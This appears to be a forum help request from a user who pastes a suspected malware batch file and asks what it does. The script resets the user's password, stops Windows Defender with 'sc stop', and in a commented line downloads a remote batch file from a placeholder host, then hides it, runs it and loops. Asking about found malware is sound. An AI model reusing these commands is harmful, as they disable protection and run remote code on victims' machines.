my PC is in the moment very laggy, because i have an virus. So, after my research, i found a .bat file with this code:
@echo off
title rundll32.exe
:run
:: registry edits removed
net user %username% NDS
sc stop WinDefend
sc stop Netzwerkmanager
:start
set rtr=%random%
:: url removed :: %~dp0\down.exe http://virus/cs.bat "%tmp%\%rtr%.tmp.bat" >nul
attrib +r +h +s "%tmp%\%rtr%.tmp.bat"
start /B /wait "" "%tmp%\%rtr%.tmp.bat"
ping localhost -n 600 >nul
goto run
can you say me, what is does??? thanks
